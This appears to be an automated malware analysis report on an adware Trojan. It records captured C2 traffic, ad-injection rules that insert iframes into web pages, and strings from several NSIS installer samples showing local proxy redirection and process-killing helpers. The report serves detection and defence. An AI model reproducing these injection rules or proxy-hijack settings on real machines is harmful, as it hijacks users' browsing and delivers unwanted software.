Server: Apache/2.2.22 (Win64) PHP/5.3.13

X-Powered-By: PHP/5.3.13

Content-Length: 2093

Keep-Alive: timeout=5, max=99

Connection: Keep-Alive

Content-Type: text/html

kds.adspirit.de/adscript.php?pid=133&ord=[timestamp]..VVV.download.cnet.com/Malwarebytes-Anti-Malware/3000-8022_4-10804572.html..download.cnet.com/Malwarebytes-Anti-Malware/3000-8022_4-10804572.html..VVV.filehippo.com/download_malwarebytes_anti_malware..filehippo.com/download_malwarebytes_anti_malware..majorgeeks.com/files/details/malwarebytes_anti_malware.html..VVV.majorgeeks.com/files/details/malwarebytes_anti_malware.html..VVV.microsoft.com/en-us/download/confirmation.aspx?id=9905..microsoft.com/en-us/download/confirmation.aspx?id=9905..ads.pubmatic.com/AdServer/js/showad.js..download.cnet.com/Comodo-Internet-Security-Premium/3000-2239_4-10460704.html..filehippo.com/download_comodo..VVV.filehippo.com/download_comodo..VVV.tomsguide.com/us/download/Comodo-Antivirus-Firewall-internet-security,0301-6605.html..tomsguide.com/us/download/Comodo-Antivirus-Firewall-internet-security,0301-6605.html..VVV.pcmag.com/article2/0,2817,2457135,00.asp..pcmag.com/article2/0,2817,2457135,00.asp..ads.pubmatic.com/AdServer/js/showad.js..b.scorecardresearch.com/beacon.js..d.gettvwizard.com/l/load.js..d.instashareonline.com/l/load.js..apiboxrockinfo-a.akamaihd.net/gsrs?is=EF23DDUS&bp=PB3&g=a636a08d-c0be-4314-b676-974f8a821dce..VVV.filehippo.com/download_malwarebytes_anti_malware..filehippo.com/download_malwarebytes_anti_malware..VVV.filehippo.com/download_malwarebytes_anti_malware/59476..filehippo.com/download_malwarebytes_anti_malware/59476..origin.languages.malwarebytes.org/downloads/..download.cnet.com/Malwarebytes-Anti-Malware/

<<< skipped >>>

GET /act/txt/vv.txt HTTP/1.1

User-Agent: tota

Host: dotap.dotdo.net

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Sat, 29 Aug 2015 11:59:12 GMT

Server: Apache/2.2.22 (Win64) PHP/5.3.13

X-Powered-By: PHP/5.3.13

Keep-Alive: timeout=5, max=98

Connection: Keep-Alive

Transfer-Encoding: chunked

Content-Type: text/html

5d26..all;;;;;;;;;;;<div class="mapAndAttrs">;;;;;;;;;;;<div class="mapAndAttrs"><iframe width="300" height="250" scrolling=no frameborder=0 scrolling=no allowtransparency=true src=hXXp://adss.dotdo.net/adss/indexR.php?size=300x250 id="ddttttr"></iframe>..all;;;;;;;;;;;<button class="reply_button js-only">;;;;;;;;;;;<br><iframe width="728" height="90" scrolling=no frameborder=0 scrolling=no allowtransparency=true src=hXXp://adss.dotdo.net/adss/indexR.php?size=728x90 id="ddttttr"></iframe><br><button class="reply_button js-only">..all;;;;;;;;;;;<header class="bchead">;;;;;;;;;;;<br><iframe width="728" height="90" scrolling=no frameborder=0 scrolling=no allowtransparency=true src=hXXp://adss.dotdo.net/adss/indexR.php?size=728x90 id="ddttttr"></iframe><br><header class="bchead">..all;;;;;;;;;;;<ul class="clfooter">;;;;;;;;;;;<br><iframe width="728" height="90" scrolling=no frameborder=0 scrolling=no allowtransparency=true src=http://adss.dotdo.net/adss/indexR.php?size=728x90 id="ddttttr"></iframe><br><ul class="clfooter">..kds.adspirit.de;;;;;;;;;;;top.location.href;;;;;;;;;;;abcd..installpath.com;;;;;;;;;;;<div style="margin:0 auto; width:320px; height:270px;">;;;;;;;;;;;<iframe width="850" height="480" scrolling=no frameborder=0 scrolling=no allowtransparency=true src=hXXp://adss.dotdo.net/adss/indexRB.php?a=11 id="ddttttr"></iframe>..VVV.installpath.com;;;;;;;;;;;

<<< skipped >>>

Map

The Trojan connects to the servers at the folowing location(s):

Strings from Dumps

wincheckfe.exe_1768:

.text

.text

`.rdata

`.rdata

@.data

@.data

.ndata

.ndata

.rsrc

.rsrc

uDSSh

uDSSh

.DEFAULT\Control Panel\International

.DEFAULT\Control Panel\International

Software\Microsoft\Windows\CurrentVersion

Software\Microsoft\Windows\CurrentVersion

GetWindowsDirectoryA

GetWindowsDirectoryA

KERNEL32.dll

KERNEL32.dll

ExitWindowsEx

ExitWindowsEx

USER32.dll

USER32.dll

GDI32.dll

GDI32.dll

SHFileOperationA

SHFileOperationA

ShellExecuteA

ShellExecuteA

SHELL32.dll

SHELL32.dll

RegEnumKeyA

RegEnumKeyA

RegCreateKeyExA

RegCreateKeyExA

RegCloseKey

RegCloseKey

RegDeleteKeyA

RegDeleteKeyA

RegOpenKeyExA

RegOpenKeyExA

ADVAPI32.dll

ADVAPI32.dll

COMCTL32.dll

COMCTL32.dll

ole32.dll

ole32.dll

VERSION.dll

VERSION.dll

verifying installer: %d%%

verifying installer: %d%%

hXXp://nsis.sf.net/NSIS_Error

hXXp://nsis.sf.net/NSIS_Error

... %d%%

... %d%%

~nsu.tmp

~nsu.tmp

%u.%u%s%s

%u.%u%s%s

RegDeleteKeyExA

RegDeleteKeyExA

%s=%s

%s=%s

*?|/":

*?|/":

~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw6.tmp\FindProcDLL.dll

~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw6.tmp\FindProcDLL.dll

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw6.tmp\FindProcDLL.dll

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw6.tmp\FindProcDLL.dll

\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw6.tmp

\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw6.tmp

\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw6.tmp\FindProcDLL.dll

\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw6.tmp\FindProcDLL.dll

.reloc

.reloc

Kernel32.DLL

Kernel32.DLL

PSAPI.DLL

PSAPI.DLL

FindProcDLL.dll

FindProcDLL.dll

System.dll

System.dll

callback%d

callback%d

g.ZO||k[

g.ZO||k[

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw6.tmp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw6.tmp

nsw6.tmp

nsw6.tmp

C:\a\wincheckfe.exe

C:\a\wincheckfe.exe

wincheckfe.exe

wincheckfe.exe

CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg5.tmp

CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg5.tmp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\

Nullsoft Install System v2.46

Nullsoft Install System v2.46

DYK287G2Jhwy64P0Ln0s.exe_1012:

.text

.text

`.rdata

`.rdata

@.data

@.data

.ndata

.ndata

.rsrc

.rsrc

uDSSh

uDSSh

.DEFAULT\Control Panel\International

.DEFAULT\Control Panel\International

Software\Microsoft\Windows\CurrentVersion

Software\Microsoft\Windows\CurrentVersion

GetWindowsDirectoryA

GetWindowsDirectoryA

KERNEL32.dll

KERNEL32.dll

ExitWindowsEx

ExitWindowsEx

USER32.dll

USER32.dll

GDI32.dll

GDI32.dll

SHFileOperationA

SHFileOperationA

ShellExecuteA

ShellExecuteA

SHELL32.dll

SHELL32.dll

RegEnumKeyA

RegEnumKeyA

RegCreateKeyExA

RegCreateKeyExA

RegCloseKey

RegCloseKey

RegDeleteKeyA

RegDeleteKeyA

RegOpenKeyExA

RegOpenKeyExA

ADVAPI32.dll

ADVAPI32.dll

COMCTL32.dll

COMCTL32.dll

ole32.dll

ole32.dll

VERSION.dll

VERSION.dll

verifying installer: %d%%

verifying installer: %d%%

hXXp://nsis.sf.net/NSIS_Error

hXXp://nsis.sf.net/NSIS_Error

... %d%%

... %d%%

~nsu.tmp

~nsu.tmp

%u.%u%s%s

%u.%u%s%s

RegDeleteKeyExA

RegDeleteKeyExA

%s=%s

%s=%s

*?|/":

*?|/":

OCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsjB.tmp\inetc.dll

OCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsjB.tmp\inetc.dll

ication Data\apDYK287G2Jhwy64P0Ln0s.html

ication Data\apDYK287G2Jhwy64P0Ln0s.html

rome.exe

rome.exe

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsjB.tmp\inetc.dll

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsjB.tmp\inetc.dll

Override: || AutoConfigURL: ||| ||| 6.0.2900.5512 ||ProxySettingsPerUser: 1 || ProxyEnable: 1 || ProxyEnableLM: 1

Override: || AutoConfigURL: ||| ||| 6.0.2900.5512 ||ProxySettingsPerUser: 1 || ProxyEnable: 1 || ProxyEnableLM: 1

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsjB.tmp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsjB.tmp

.reloc

.reloc

SShL0

SShL0

PeekNamedPipe

PeekNamedPipe

CreatePipe

CreatePipe

nsExec.dll

nsExec.dll

99|9

99|9

: :0:5:>:

: :0:5:>:

u.Uj@

u.Uj@

MSVCRT.dll

MSVCRT.dll

HttpSendRequestA

HttpSendRequestA

HttpSendRequestExA

HttpSendRequestExA

HttpQueryInfoA

HttpQueryInfoA

FtpCreateDirectoryA

FtpCreateDirectoryA

FtpOpenFileA

FtpOpenFileA

HttpOpenRequestA

HttpOpenRequestA

HttpAddRequestHeadersA

HttpAddRequestHeadersA

HttpEndRequestA

HttpEndRequestA

InternetCrackUrlA

InternetCrackUrlA

WININET.dll

WININET.dll

inetc.dll

inetc.dll

Open URL Error

Open URL Error

URL Parts Error

URL Parts Error

FtpCreateDir failed (550)

FtpCreateDir failed (550)

Error FTP path (550)

Error FTP path (550)

Downloading %s

Downloading %s

%dkB (%d%%) of %dkB @ %d.dkB/s

%dkB (%d%%) of %dkB @ %d.dkB/s

(%d %s%s remaining)

(%d %s%s remaining)

REST %d

REST %d

SIZE %s

SIZE %s

Content-Length: %d

Content-Length: %d

Content-Type: application/x-www-form-urlencoded

Content-Type: application/x-www-form-urlencoded

Authorization: basic %s

Authorization: basic %s

Proxy-authorization: basic %s

Proxy-authorization: basic %s

%s:%s

%s:%s

FtpCommandA

FtpCommandA

wininet.dll

wininet.dll

%u MB

%u MB

%u kB

%u kB

%u bytes

%u bytes

%d:d:d

%d:d:d

%s - %s

%s - %s

(Err=%d)

(Err=%d)

NSIS_Inetc (Mozilla)

NSIS_Inetc (Mozilla)

Filename: %s

Filename: %s

/password

/password

Uploading %s

Uploading %s

9!9-9B9}9

9!9-9B9}9

g.ZO||k[

g.ZO||k[

%Documents and Settings%\%current user%\Local Settings\Application Data\apDYK287G2Jhwy64P0Ln0s.html

%Documents and Settings%\%current user%\Local Settings\Application Data\apDYK287G2Jhwy64P0Ln0s.html

A~loogg2.txt

A~loogg2.txt

hwy64P0Ln0s.html

hwy64P0Ln0s.html

PDYK2~1.HTM

PDYK2~1.HTM

UME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsjB.tmp\inetc.dll

UME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsjB.tmp\inetc.dll

tml/fide/lo2DYK287G2Jhwy64P0Ln0s.txt

tml/fide/lo2DYK287G2Jhwy64P0Ln0s.txt

ConfigURL: ||| ||| 6.0.2900.5512 ||ProxySettingsPerUser: 1 || ProxyEnable: 1 || ProxyEnableLM: 1

ConfigURL: ||| ||| 6.0.2900.5512 ||ProxySettingsPerUser: 1 || ProxyEnable: 1 || ProxyEnableLM: 1

\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsjB.tmp

\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsjB.tmp

1464376

1464376

winonit.exe

winonit.exe

0Ln0s.exe

0Ln0s.exe

1495012

1495012

C:\a\DYK287G2Jhwy64P0Ln0s.exe

C:\a\DYK287G2Jhwy64P0Ln0s.exe

DYK287G2Jhwy64P0Ln0s.exe

DYK287G2Jhwy64P0Ln0s.exe

CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg4.tmp

CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg4.tmp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\

http=127.0.0.1:8877;https=127.0.0.1:8877

http=127.0.0.1:8877;https=127.0.0.1:8877

C:\a\internetport3.exe

C:\a\internetport3.exe

6.0.2900.5512

6.0.2900.5512

63839615.bat

63839615.bat

.exe" -n vmusr

.exe" -n vmusr

wcheckf.exe

wcheckf.exe

wincheckfe.exe

wincheckfe.exe

Nullsoft Install System v2.46

Nullsoft Install System v2.46

ttps=127.0.0.1:8877

ttps=127.0.0.1:8877

tport3.exe

tport3.exe

5.bat

5.bat

port3.exe

port3.exe

Tools\vmtoolsd.exe" -n vmusr

Tools\vmtoolsd.exe" -n vmusr

DYK287G2Jhwy64P0Ln0s.exe_1012_rwx_10004000_00001000:

callback%d

callback%d

wincheckfe.exe_1768_rwx_10004000_00001000:

callback%d

callback%d

wcheckf.exe_484:

.text

.text

`.rdata

`.rdata

@.data

@.data

.ndata

.ndata

.rsrc

.rsrc

uDSSh

uDSSh

.DEFAULT\Control Panel\International

.DEFAULT\Control Panel\International

Software\Microsoft\Windows\CurrentVersion

Software\Microsoft\Windows\CurrentVersion

GetWindowsDirectoryA

GetWindowsDirectoryA

KERNEL32.dll

KERNEL32.dll

ExitWindowsEx

ExitWindowsEx

USER32.dll

USER32.dll

GDI32.dll

GDI32.dll

SHFileOperationA

SHFileOperationA

ShellExecuteA

ShellExecuteA

SHELL32.dll

SHELL32.dll

RegEnumKeyA

RegEnumKeyA

RegCreateKeyExA

RegCreateKeyExA

RegCloseKey

RegCloseKey

RegDeleteKeyA

RegDeleteKeyA

RegOpenKeyExA

RegOpenKeyExA

ADVAPI32.dll

ADVAPI32.dll

COMCTL32.dll

COMCTL32.dll

ole32.dll

ole32.dll

VERSION.dll

VERSION.dll

verifying installer: %d%%

verifying installer: %d%%

hXXp://nsis.sf.net/NSIS_Error

hXXp://nsis.sf.net/NSIS_Error

... %d%%

... %d%%

~nsu.tmp

~nsu.tmp

%u.%u%s%s

%u.%u%s%s

RegDeleteKeyExA

RegDeleteKeyExA

%s=%s

%s=%s

*?|/":

*?|/":

%Program Files%\Google\Chrome\Application\chrome.exe

%Program Files%\Google\Chrome\Application\chrome.exe

e.exe

e.exe

a\Google\Chrome\Application\chrome.exe

a\Google\Chrome\Application\chrome.exe

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg8.tmp\FindProcDLL.dll

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg8.tmp\FindProcDLL.dll

DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg8.tmp

DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg8.tmp

on\Internet Settings AutoConfigURL

on\Internet Settings AutoConfigURL

DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg8.tmp\FindProcDLL.dll

DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg8.tmp\FindProcDLL.dll

@.reloc

@.reloc

u.Uj@

u.Uj@

MSVCRT.dll

MSVCRT.dll

HttpSendRequestA

HttpSendRequestA

HttpSendRequestExA

HttpSendRequestExA

HttpQueryInfoA

HttpQueryInfoA

FtpCreateDirectoryA

FtpCreateDirectoryA

FtpOpenFileA

FtpOpenFileA

HttpOpenRequestA

HttpOpenRequestA

HttpAddRequestHeadersA

HttpAddRequestHeadersA

HttpEndRequestA

HttpEndRequestA

InternetCrackUrlA

InternetCrackUrlA

WININET.dll

WININET.dll

inetc.dll

inetc.dll

Open URL Error

Open URL Error

URL Parts Error

URL Parts Error

FtpCreateDir failed (550)

FtpCreateDir failed (550)

Error FTP path (550)

Error FTP path (550)

Downloading %s

Downloading %s

%dkB (%d%%) of %dkB @ %d.dkB/s

%dkB (%d%%) of %dkB @ %d.dkB/s

(%d %s%s remaining)

(%d %s%s remaining)

REST %d

REST %d

SIZE %s

SIZE %s

Content-Length: %d

Content-Length: %d

Content-Type: application/x-www-form-urlencoded

Content-Type: application/x-www-form-urlencoded

Authorization: basic %s

Authorization: basic %s

Proxy-authorization: basic %s

Proxy-authorization: basic %s

%s:%s

%s:%s

FtpCommandA

FtpCommandA

wininet.dll

wininet.dll

%u MB

%u MB

%u kB

%u kB

%u bytes

%u bytes

%d:d:d

%d:d:d

%s - %s

%s - %s

(Err=%d)

(Err=%d)

NSIS_Inetc (Mozilla)

NSIS_Inetc (Mozilla)

Filename: %s

Filename: %s

/password

/password

Uploading %s

Uploading %s

9!9-9B9}9

9!9-9B9}9

!%[ %S

!%[ %S

g.ZO||k[

g.ZO||k[

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg8.tmp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg8.tmp

nsg8.tmp

nsg8.tmp

ogram Files\Google\Chrome\Application\chrome.exe

ogram Files\Google\Chrome\Application\chrome.exe

\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg8.tmp

\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg8.tmp

C:\a\wcheckf.exe

C:\a\wcheckf.exe

wcheckf.exe

wcheckf.exe

CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg7.tmp

CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg7.tmp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\

Nullsoft Install System v2.46

Nullsoft Install System v2.46

wcheckf.exe_484_rwx_10004000_00001000:

callback%d

callback%d

winonit.exe_1360:

.text

.text

`.rdata

`.rdata

@.data

@.data

.ndata

.ndata

.rsrc

.rsrc

uDSSh

uDSSh

.DEFAULT\Control Panel\International

.DEFAULT\Control Panel\International

Software\Microsoft\Windows\CurrentVersion

Software\Microsoft\Windows\CurrentVersion

GetWindowsDirectoryA

GetWindowsDirectoryA

KERNEL32.dll

KERNEL32.dll

ExitWindowsEx

ExitWindowsEx

USER32.dll

USER32.dll

GDI32.dll

GDI32.dll

SHFileOperationA

SHFileOperationA

ShellExecuteA

ShellExecuteA

SHELL32.dll

SHELL32.dll

RegEnumKeyA

RegEnumKeyA

RegCreateKeyExA

RegCreateKeyExA

RegCloseKey

RegCloseKey

RegDeleteKeyA

RegDeleteKeyA

RegOpenKeyExA

RegOpenKeyExA

ADVAPI32.dll

ADVAPI32.dll

COMCTL32.dll

COMCTL32.dll

ole32.dll

ole32.dll

VERSION.dll

VERSION.dll

verifying installer: %d%%

verifying installer: %d%%

hXXp://nsis.sf.net/NSIS_Error

hXXp://nsis.sf.net/NSIS_Error

... %d%%

... %d%%

~nsu.tmp

~nsu.tmp

%u.%u%s%s

%u.%u%s%s

RegDeleteKeyExA

RegDeleteKeyExA

%s=%s

%s=%s

*?|/":

*?|/":

%Documents and Settings%\%current user%\Local Settings\Application Data\yuntnani\vchk.exe

%Documents and Settings%\%current user%\Local Settings\Application Data\yuntnani\vchk.exe

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nshA.tmp\KillProcDLL.dll

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nshA.tmp\KillProcDLL.dll

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nshA.tmp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nshA.tmp

.reloc

.reloc

Kernel32.DLL

Kernel32.DLL

PSAPI.DLL

PSAPI.DLL

MSVCRT.dll

MSVCRT.dll

KillProcDLL.dll

KillProcDLL.dll

u.Uj@

u.Uj@

HttpSendRequestA

HttpSendRequestA

HttpSendRequestExA

HttpSendRequestExA

HttpQueryInfoA

HttpQueryInfoA

FtpCreateDirectoryA

FtpCreateDirectoryA

FtpOpenFileA

FtpOpenFileA

HttpOpenRequestA

HttpOpenRequestA

HttpAddRequestHeadersA

HttpAddRequestHeadersA

HttpEndRequestA

HttpEndRequestA

InternetCrackUrlA

InternetCrackUrlA

WININET.dll

WININET.dll

inetc.dll

inetc.dll

Open URL Error

Open URL Error

URL Parts Error

URL Parts Error

FtpCreateDir failed (550)

FtpCreateDir failed (550)

Error FTP path (550)

Error FTP path (550)

Downloading %s

Downloading %s

%dkB (%d%%) of %dkB @ %d.dkB/s

%dkB (%d%%) of %dkB @ %d.dkB/s

(%d %s%s remaining)

(%d %s%s remaining)

REST %d

REST %d

SIZE %s

SIZE %s

Content-Length: %d

Content-Length: %d

Content-Type: application/x-www-form-urlencoded

Content-Type: application/x-www-form-urlencoded

Authorization: basic %s

Authorization: basic %s

Proxy-authorization: basic %s

Proxy-authorization: basic %s

%s:%s

%s:%s

FtpCommandA

FtpCommandA

wininet.dll

wininet.dll

%u MB

%u MB

%u kB

%u kB

%u bytes

%u bytes

%d:d:d

%d:d:d

%s - %s

%s - %s

(Err=%d)

(Err=%d)

NSIS_Inetc (Mozilla)

NSIS_Inetc (Mozilla)

Filename: %s

Filename: %s

/password

/password

Uploading %s

Uploading %s

9!9-9B9}9

9!9-9B9}9

\.lR%

\.lR%

g.ZO||k[

g.ZO||k[

C:\a\avv.txt

C:\a\avv.txt

avv.txt

avv.txt

m\LOCALS~1\Temp\nshA.tmp

m\LOCALS~1\Temp\nshA.tmp

ments and Settings\"%CurrentUserName%"\Local Settings\Application Data\yuntnani\vchk.exe

ments and Settings\"%CurrentUserName%"\Local Settings\Application Data\yuntnani\vchk.exe

\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nshA.tmp

\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nshA.tmp

C:\a\winonit.exe

C:\a\winonit.exe

winonit.exe

winonit.exe

CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh9.tmp

CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh9.tmp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\

Nullsoft Install System v2.46

Nullsoft Install System v2.46

winonit.exe_1360_rwx_10004000_00001000:

callback%d

callback%d

getcap.exe_500:

.text

.text

`.rdata

`.rdata

@.data

@.data

.ndata

.ndata

.rsrc

.rsrc

uDSSh

uDSSh

.DEFAULT\Control Panel\International

.DEFAULT\Control Panel\International

Software\Microsoft\Windows\CurrentVersion

Software\Microsoft\Windows\CurrentVersion

GetWindowsDirectoryA

GetWindowsDirectoryA

KERNEL32.dll

KERNEL32.dll

ExitWindowsEx

ExitWindowsEx

USER32.dll

USER32.dll

GDI32.dll

GDI32.dll

SHFileOperationA

SHFileOperationA

ShellExecuteA

ShellExecuteA

SHELL32.dll

SHELL32.dll

RegEnumKeyA

RegEnumKeyA

RegCreateKeyExA

RegCreateKeyExA

RegCloseKey

RegCloseKey

RegDeleteKeyA

RegDeleteKeyA

RegOpenKeyExA

RegOpenKeyExA

ADVAPI32.dll

ADVAPI32.dll

COMCTL32.dll

COMCTL32.dll

ole32.dll

ole32.dll

VERSION.dll

VERSION.dll

verifying installer: %d%%

verifying installer: %d%%

hXXp://nsis.sf.net/NSIS_Error

hXXp://nsis.sf.net/NSIS_Error

... %d%%

... %d%%

~nsu.tmp

~nsu.tmp

%u.%u%s%s

%u.%u%s%s

RegDeleteKeyExA

RegDeleteKeyExA

%s=%s

%s=%s

*?|/":

*?|/":

\a\7za.exe

\a\7za.exe

S~1\Temp\nsyD.tmp\System.dll

S~1\Temp\nsyD.tmp\System.dll

UME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsyD.tmp\System.dll

UME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsyD.tmp\System.dll

C:\a\ukey.ini

C:\a\ukey.ini

7za.exe

7za.exe

E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsyD.tmp\System.dll

E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsyD.tmp\System.dll

GetCPInfo

GetCPInfo

MB, # %s =

MB, # %s =

RAM %s

RAM %s

Data Error in encrypted file. Wrong password?

Data Error in encrypted file. Wrong password?

CRC Failed in encrypted file. Wrong password?

CRC Failed in encrypted file. Wrong password?

Unsupported Method

Unsupported Method

Can not open encrypted archive. Wrong password?

Can not open encrypted archive. Wrong password?

Unsupported archive type

Unsupported archive type

-p{Password}: set Password

-p{Password}: set Password

is not supported archive

is not supported archive

Enter password (will not be echoed):

Enter password (will not be echoed):

Advapi32.dll

Advapi32.dll

kernel32.dll

kernel32.dll

update operations are not supported for this archive

update operations are not supported for this archive

Mapi32.dll

Mapi32.dll

lzma 7z ace arc arj bz bz2 deb lzo lzx gz pak rpm sit tgz tbz tbz2 tgz cab ha lha lzh rar zoo zip jar ear war msi 3gp avi mov mpeg mpg mpe wmv aac ape fla flac la mp3 m4a mp4 ofr ogg pac ra rm rka shn swa tta wv wma wav swf chm hxi hxs gif jpeg jpg jp2 png tiff bmp ico psd psp awg ps eps cgm dxf svg vrml wmf emf ai md cad dwg pps key sxi max 3ds iso bin nrg mdf img pdi tar cpio xpi vfd vhd vud vmc vsv vmdk dsk nvram vmem vmsd vmsn vmss vmtm inl inc idl acf asa h hpp hxx c cpp cxx rc java cs pas bas vb cls ctl frm dlg def f77 f f90 f95 asm sql manifest dep mak clw csproj vcproj sln dsp dsw class bat cmd xml xsd xsl xslt hxk hxc htm html xhtml xht mht mhtml htw asp aspx css cgi jsp shtml awk sed hta js php php3 php4 php5 phptml pl pm py pyo rb sh tcl vbs text txt tex ans asc srt reg ini doc docx mcw dot rtf hlp xls xlr xlt xlw ppt pdf sxc sxd sxi sxg sxw stc sti stw stm odt ott odg otg odp otp ods ots odf abw afp cwk lwp wpd wps wpt wrf wri abf afm bdf fon mgf otf pcf pfa snf ttf dbf mdb nsf ntf wdb db fdb gdb exe dll ocx vbx sfx sys tlb awx com obj lib out o so pdb pch idb ncb opt

lzma 7z ace arc arj bz bz2 deb lzo lzx gz pak rpm sit tgz tbz tbz2 tgz cab ha lha lzh rar zoo zip jar ear war msi 3gp avi mov mpeg mpg mpe wmv aac ape fla flac la mp3 m4a mp4 ofr ogg pac ra rm rka shn swa tta wv wma wav swf chm hxi hxs gif jpeg jpg jp2 png tiff bmp ico psd psp awg ps eps cgm dxf svg vrml wmf emf ai md cad dwg pps key sxi max 3ds iso bin nrg mdf img pdi tar cpio xpi vfd vhd vud vmc vsv vmdk dsk nvram vmem vmsd vmsn vmss vmtm inl inc idl acf asa h hpp hxx c cpp cxx rc java cs pas bas vb cls ctl frm dlg def f77 f f90 f95 asm sql manifest dep mak clw csproj vcproj sln dsp dsw class bat cmd xml xsd xsl xslt hxk hxc htm html xhtml xht mht mhtml htw asp aspx css cgi jsp shtml awk sed hta js php php3 php4 php5 phptml pl pm py pyo rb sh tcl vbs text txt tex ans asc srt reg ini doc docx mcw dot rtf hlp xls xlr xlt xlw ppt pdf sxc sxd sxi sxg sxw stc sti stw stm odt ott odg otg odp otp ods ots odf abw afp cwk lwp wpd wps wpt wrf wri abf afm bdf fon mgf otf pcf pfa snf ttf dbf mdb nsf ntf wdb db fdb gdb exe dll ocx vbx sfx sys tlb awx com obj lib out o so pdb pch idb ncb opt

OLEAUT32.dll

OLEAUT32.dll

GetWindowsDirectoryW

GetWindowsDirectoryW

E%SsK*X|

E%SsK*X|

, .MN6b

, .MN6b

1%uhx

1%uhx

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsyD.tmp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsyD.tmp

ukey.ini

ukey.ini

\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsyD.tmp

\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsyD.tmp

C:\a\getcap.exe

C:\a\getcap.exe

getcap.exe

getcap.exe

CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsiC.tmp

CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsiC.tmp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\

Nullsoft Install System v2.46

Nullsoft Install System v2.46

H7zCon.sfx

H7zCon.sfx

7-Zip cannot load Mapi32.dll

7-Zip cannot load Mapi32.dll

A* * .tar .tar

A* * .tar .tar

B* .tar

B* .tar

getcap.exe_500_rwx_10004000_00001000:

callback%d

callback%d

vchk.exe_1976:

.text

.text

`.rdata

`.rdata

@.data

@.data

.ndata

.ndata

.rsrc

.rsrc

uDSSh

uDSSh

.DEFAULT\Control Panel\International

.DEFAULT\Control Panel\International

Software\Microsoft\Windows\CurrentVersion

Software\Microsoft\Windows\CurrentVersion

GetWindowsDirectoryA

GetWindowsDirectoryA

KERNEL32.dll

KERNEL32.dll

ExitWindowsEx

ExitWindowsEx

USER32.dll

USER32.dll

GDI32.dll

GDI32.dll

SHFileOperationA

SHFileOperationA

ShellExecuteA

ShellExecuteA

SHELL32.dll

SHELL32.dll

RegEnumKeyA

RegEnumKeyA

RegCreateKeyExA

RegCreateKeyExA

RegCloseKey

RegCloseKey

RegDeleteKeyA

RegDeleteKeyA

RegOpenKeyExA

RegOpenKeyExA

ADVAPI32.dll

ADVAPI32.dll

COMCTL32.dll

COMCTL32.dll

ole32.dll

ole32.dll

VERSION.dll

VERSION.dll

verifying installer: %d%%

verifying installer: %d%%

hXXp://nsis.sf.net/NSIS_Error

hXXp://nsis.sf.net/NSIS_Error

... %d%%

... %d%%

~nsu.tmp

~nsu.tmp

%u.%u%s%s

%u.%u%s%s

